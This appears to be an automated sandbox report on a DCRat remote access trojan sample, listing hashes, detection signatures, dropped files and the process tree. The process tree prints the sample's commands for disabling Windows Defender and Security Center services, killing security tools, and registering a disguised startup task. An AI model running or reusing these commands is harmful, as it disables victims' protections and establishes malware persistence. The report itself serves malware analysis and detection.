Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    14-05-2024 11:55

General

  • Target

    c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe

  • Size

    2.4MB

  • MD5

    c564138a5dfe37ca9392c0ed3722bb10

  • SHA1

    b859f2931678370ec7323284c48ee84420403dc6

  • SHA256

    f4abbf4717010d698712c6f85944d73755d0fc30a60844fc6d0c9d86822cca38

  • SHA512

    d0f92d165a455d838e9ffe83d4b8d5843ef65315ff2fe151bfebe6a09d1c8b8be842c797000fc46238a37f76b137bd6d491a84b7cd84e2412d96337cab9a6deb

  • SSDEEP

    24576:XF/Qs4a9rtQ/D5ey/A5m27P8fIeWRvtuEpjgbnvPQN5vYB9n5g9U0MOMJwPQ+3oS:XF6KNjgZwQ+33e76

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Modifies security service 2 TTPs 3 IoCs
  • DCRat payload 1 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 62 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe
    "C:\Users\Admin\AppData\Local\Temp\c564138a5dfe37ca9392c0ed3722bb10_NeikiAnalytics.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1492
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -MAPSReporting 0 >nul
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2408
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-MpPreference -MAPSReporting 0
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2376
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -MAPSReporting Disabled >nul
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3004
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-MpPreference -MAPSReporting Disabled
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2956
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /f /im SecHealthUI.exe >nul 2>nul
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2812
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im SecHealthUI.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2748
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -UiLockDown 1 >nul 2>nul
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2652
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-MpPreference -UiLockDown 1
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2528
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /f /im SecHealthUI.exe >nul 2>nul
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2600
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im SecHealthUI.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2880
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -SubmitSamplesConsent 0 >nul
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1676
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-MpPreference -SubmitSamplesConsent 0
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2896
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c start "" "C:\ProgramData\Microsoft\Windows\Caches\UpdateWeb2View.exe" >nul
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2868
      • C:\ProgramData\Microsoft\Windows\Caches\UpdateWeb2View.exe
        "C:\ProgramData\Microsoft\Windows\Caches\UpdateWeb2View.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Drops file in Program Files directory
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2908
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c echo >nul
      2⤵
        PID:2368
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c start /b "" "C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe" >nul
        2⤵
        • Loads dropped DLL
        PID:2232
        • C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe
          "C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe"
          3⤵
          • Executes dropped EXE
          PID:2204
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1052
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disabled
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1088
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 0
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1192
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMnitoring $true
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1432
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -UILockdown $true
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1112
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:448
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableRealtimeMonitoring -Value 1 -PropertyType DWORD -Force"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1508
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\SecurityHealthService' -Name Start -Value 4 -PropertyType DWORD -Force"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2432
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\wscsvc' -Name Start -Value 4 -PropertyType DWORD -Force"
            4⤵
            • Modifies security service
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3000
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableBehaviorMonitoring -Value 1 -PropertyType DWORD -Force"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1920
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableOnAccessProtection -Value 1 -PropertyType DWORD -Force"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2164
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableScanOnRealtimeEnable -Value 1 -PropertyType DWORD -Force"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2364
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $True
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2956
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$action=New-ScheduledTaskAction -Execute 'C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe'; $trigger = @(New-ScheduledTaskTrigger -AtStartup; New-ScheduledTaskTrigger -AtLogon); $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -DisallowHardTerminate -ExecutionTimeLimit ([TimeSpan]::FromDays(999)); Register-ScheduledTask -TaskName 'NetTraceInfoTask' -taskPath '\Microsoft\Windows\NetTrace' -Action $action -Trigger $trigger -Settings $settings -RunLevel Highest -Description 'Task that checks the NET connection trace.';"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2172
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1032
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disabled
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:324
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 0
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1256
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMnitoring $true
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2444
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -UILockdown $true
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1684
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:536
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableRealtimeMonitoring -Value 1 -PropertyType DWORD -Force"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1844
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\SecurityHealthService' -Name Start -Value 4 -PropertyType DWORD -Force"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1292
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\wscsvc' -Name Start -Value 4 -PropertyType DWORD -Force"
            4⤵
            • Modifies security service
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1760
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableBehaviorMonitoring -Value 1 -PropertyType DWORD -Force"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:692
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableOnAccessProtection -Value 1 -PropertyType DWORD -Force"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2068
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableScanOnRealtimeEnable -Value 1 -PropertyType DWORD -Force"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2860
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $True
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2924
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$action=New-ScheduledTaskAction -Execute 'C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe'; $trigger = @(New-ScheduledTaskTrigger -AtStartup; New-ScheduledTaskTrigger -AtLogon); $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -DisallowHardTerminate -ExecutionTimeLimit ([TimeSpan]::FromDays(999)); Register-ScheduledTask -TaskName 'NetTraceInfoTask' -taskPath '\Microsoft\Windows\NetTrace' -Action $action -Trigger $trigger -Settings $settings -RunLevel Highest -Description 'Task that checks the NET connection trace.';"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1124
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2932
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disabled
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1968
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 0
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1548
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMnitoring $true
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:764
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -UILockdown $true
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2828
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:652
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableRealtimeMonitoring -Value 1 -PropertyType DWORD -Force"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:528
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\SecurityHealthService' -Name Start -Value 4 -PropertyType DWORD -Force"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1140
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\wscsvc' -Name Start -Value 4 -PropertyType DWORD -Force"
            4⤵
            • Modifies security service
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1640
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableBehaviorMonitoring -Value 1 -PropertyType DWORD -Force"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:900
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableOnAccessProtection -Value 1 -PropertyType DWORD -Force"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:872
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' -Name DisableScanOnRealtimeEnable -Value 1 -PropertyType DWORD -Force"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2872
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $True
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1528
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$action=New-ScheduledTaskAction -Execute 'C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe'; $trigger = @(New-ScheduledTaskTrigger -AtStartup; New-ScheduledTaskTrigger -AtLogon); $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -DisallowHardTerminate -ExecutionTimeLimit ([TimeSpan]::FromDays(999)); Register-ScheduledTask -TaskName 'NetTraceInfoTask' -taskPath '\Microsoft\Windows\NetTrace' -Action $action -Trigger $trigger -Settings $settings -RunLevel Highest -Description 'Task that checks the NET connection trace.';"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1244
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell.exe "$action=New-ScheduledTaskAction -Execute 'C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe'; $trigger = @(New-ScheduledTaskTrigger -AtStartup; New-ScheduledTaskTrigger -AtLogon); $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -DisallowHardTerminate -ExecutionTimeLimit ([TimeSpan]::FromDays(999)); Register-ScheduledTask -TaskName 'NetTraceInfoTask' -taskPath '\Microsoft\Windows\NetTrace' -Action $action -Trigger $trigger -Settings $settings -RunLevel Highest -Description 'Task that checks the NET connection trace.';" >nul
        2⤵
          PID:1724
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe "$action=New-ScheduledTaskAction -Execute 'C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe'; $trigger = @(New-ScheduledTaskTrigger -AtStartup; New-ScheduledTaskTrigger -AtLogon); $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -DisallowHardTerminate -ExecutionTimeLimit ([TimeSpan]::FromDays(999)); Register-ScheduledTask -TaskName 'NetTraceInfoTask' -taskPath '\Microsoft\Windows\NetTrace' -Action $action -Trigger $trigger -Settings $settings -RunLevel Highest -Description 'Task that checks the NET connection trace.';"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1736

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\Microsoft\Network\Connections\NetTraceAgent.exe

        Filesize

        208KB

        MD5

        a58599f667d687f6eb51bb528a6bb528

        SHA1

        0991f92dc45d82227775f9968d91dcbe703d03a2

        SHA256

        b93b33fff6d41f5c0388ec4a1e424db2a304582e998596810f47b9b823ef2807

        SHA512

        2dd48e6042a65c0d7f1af17676ef3cc35dbdf5978c68ca00a1b6e228146bec306411e38e4bbffaf0de172dd7cbdd2993e9cb5c645d4251d420acb0501d39d0b1

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

        Filesize

        7KB

        MD5

        7d8e619d3274bfe2726aa61e1e22b904

        SHA1

        33d3efd6333f0999a141a35c419a94b99b18eb91

        SHA256

        023bcc0e267bdd7148758f7eb15b32002beaae1d19e2a6a666679b214317dcea

        SHA512

        726beca385b989a754beabe0c84ed7d2f5df1e4a783da83424db99b6daf73659e91d1e07286d88e90e1cdf8d9a6bddcbfcb60a46a9e748cfec778319e21f1e03

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

        Filesize

        7KB

        MD5

        8dff18646bd564e8ca6c671b5876cc30

        SHA1

        7fd2c63047ab11eb177a49412d134957cc9aa8ae

        SHA256

        52494bf2f8f222ad90c89683db0d9f8d6bfddc349d44bfb7dc0c4d9ad253084e

        SHA512

        61c4428293ce0f85cefd640e535ca55b1ab41a44dd7c5e0df294b805308841ec28fa2d1cc0205d37f020d53b9d318be098d4042a77d6cfabd2fcdb558b7f21fe

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

        Filesize

        7KB

        MD5

        06c17315717ec95bd609351e3b0de88e

        SHA1

        d4c5cb2d0887fa75b85893b5aba1ce82de071eb8

        SHA256

        9dcb3313a6132a0ad6737915ebfee89cac3faa12be942b8714c78f6d65146b95

        SHA512

        3f75812c71264c1248f484812206950001398c15cb278493106da83971edc9a09ea106488ab892cc2f4f56665a636fec5306c32b97726062a4035da2ef5e2eb6

      • \??\PIPE\srvsvc

        MD5

        d41d8cd98f00b204e9800998ecf8427e

        SHA1

        da39a3ee5e6b4b0d3255bfef95601890afd80709

        SHA256

        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

        SHA512

        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

      • \ProgramData\Microsoft\Windows\Caches\UpdateWeb2View.exe

        Filesize

        768KB

        MD5

        377fc74b249bfc1be3258a6facd9327a

        SHA1

        42620e2f8dc6d890d312f81a2337ae40b7a6a73b

        SHA256

        df016016c94d7ad3f689b994f54f3070a91f2054e808a005a398875164cf7ec1

        SHA512

        f075185ca9e2a7fbd801b3aca33e29790630912edbb727d419e039c50a7af3c7578f77ec5e7e607a22291efde54014538b7a321143b95045695d571463a9fa45

      • memory/2376-5-0x0000000074650000-0x0000000074BFB000-memory.dmp

        Filesize

        5.7MB

      • memory/2376-2-0x0000000074651000-0x0000000074652000-memory.dmp

        Filesize

        4KB

      • memory/2376-4-0x0000000074650000-0x0000000074BFB000-memory.dmp

        Filesize

        5.7MB

      • memory/2376-3-0x0000000074650000-0x0000000074BFB000-memory.dmp

        Filesize

        5.7MB

      • memory/2908-29-0x0000000000D90000-0x0000000000E56000-memory.dmp

        Filesize

        792KB

      • memory/2908-40-0x0000000000890000-0x00000000008E8000-memory.dmp

        Filesize

        352KB

      • memory/2908-55-0x0000000005060000-0x00000000050C6000-memory.dmp

        Filesize

        408KB

      • memory/2908-56-0x0000000000C00000-0x0000000000C0E000-memory.dmp

        Filesize

        56KB